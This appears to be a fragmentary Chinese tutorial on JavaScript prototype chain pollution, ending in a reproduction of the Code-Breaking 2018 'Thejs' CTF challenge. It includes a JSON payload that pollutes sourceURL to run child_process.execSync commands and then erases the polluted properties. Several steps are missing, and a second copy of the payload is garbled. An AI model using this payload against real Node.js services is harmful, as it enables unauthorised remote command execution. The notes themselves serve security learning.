原型链污染

一 原型链污染原理

prototype是一个类的属性，所有类对象在实例化的时候将会拥有prototype中的属性和方法

一个对象的__proto__属性，指向这个对象所在的类的prototype属性

例如 foo.__proto__指向的是Foo类的prototype。那么，如果我们修改了foo.__proto__中的值，意味着就可以修改Foo类

二，简单的原型链污染实验

foo是一个简单的JavaScript对象

foo.bar 此时为1

由于查找顺序的原因，foo.bar仍然是1

此时再用Object创建一个空的zoo对象

查看zoo.bar

查看结果

分析

三， Code-Breaking 2018 Thejs原型链污染复现

1，运用的知识点

2，原理分析 //...merge 给sourceURL赋值 实现任意命令执行 通过原型链污染实现//

//...new Function(x, 'return y') 相当于function add(x){ return }//

{"__proto__": {"sourceURL": "\u000areturn ()=>{for (var a in {}) {delete Object.prototype[a];} 
return global.process.mainModule.constructor._load('child_process').execSync('id')}\u000a//"}

//nodejs中有一个模块叫做process process底下有一个子模块叫chid_process

,其下有一个方法叫做execSync('whoami')执行命令//

return global.process.mainModule.constructor._load('child_process').execSync('id')}\u000a//"}}

让原来的return失效，新的return把它替换掉 通过\u000a换行符把return换下来，再注释掉

{"proto": {"sourceURL": "\u000areturn ()=>{for (var a in {})

{delete Object.prototypea;} 干什么？为了不让其他人看见这个flag,所以我把这个flag删除了

//{delete Object.prototypea;}将object对象中的所有属性循环出来，再进行删除

三，复现